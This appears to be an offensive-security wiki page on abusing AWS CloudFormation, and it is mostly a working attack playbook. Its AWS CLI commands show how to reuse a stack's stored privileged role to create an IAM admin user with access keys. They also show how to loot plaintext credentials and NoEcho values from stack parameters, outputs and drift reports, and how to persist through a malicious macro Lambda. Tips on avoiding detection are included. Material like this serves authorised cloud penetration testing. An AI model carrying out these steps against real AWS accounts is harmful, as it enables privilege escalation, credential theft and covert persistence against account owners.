A deployed CloudFormation stack may have been created with a stack role more privileged than you. cloudformation:UpdateStack reuses that stored role by default, so submitting a modified template provisions whatever the role can create, including IAM principals, with no PassRole of your own.
Update with the stored role#
# fetch the current template, add an admin user or policy attachment, resubmit
aws cloudformation get-template --stack-name <stack> --query TemplateBody > t.json
# edit t.json to add e.g. an AWS::IAM::User with an access key
aws cloudformation update-stack --stack-name <stack> \
--template-body file://t.json --capabilities CAPABILITY_NAMED_IAM
Loot secrets from stacks and templates#
Before changing anything, read the existing stacks: parameters and outputs routinely hold plaintext credentials, and NoEcho only masks a parameter in the console, not in the template or the drift view.
aws cloudformation describe-stacks --query 'Stacks[].{N:StackName,P:Parameters,O:Outputs}'
aws cloudformation get-template --stack-name <stack> --template-stage Processed
# recover a NoEcho parameter value from the processed/rendered resources or a drift diff
aws cloudformation detect-stack-drift --stack-name <stack>
aws cloudformation describe-stack-resource-drifts --stack-name <stack>
Persist with a macro#
A CloudFormation macro is a Lambda that CloudFormation invokes to transform templates. Registering a macro (or pointing an existing one at a function you control) means every future stack operation that references it runs your Lambda inside the deploy pipeline, a durable foothold that looks like normal infrastructure.
aws cloudformation create-stack --stack-name m --template-body file://macro.yaml \
--capabilities CAPABILITY_IAM # macro.yaml defines AWS::CloudFormation::Macro -> your Lambda
Exploitation notes#
- The stack reuses its existing role unless you pass a different
--role-arn, so you inherit its privileges for free. - Keep the rest of the template intact to avoid destroying resources and drawing attention; add, do not replace.
- Stack outputs can surface the created key directly.
Tools#
- AWS CLI (
cloudformation get-template/update-stack). - Pacu: CloudFormation modules.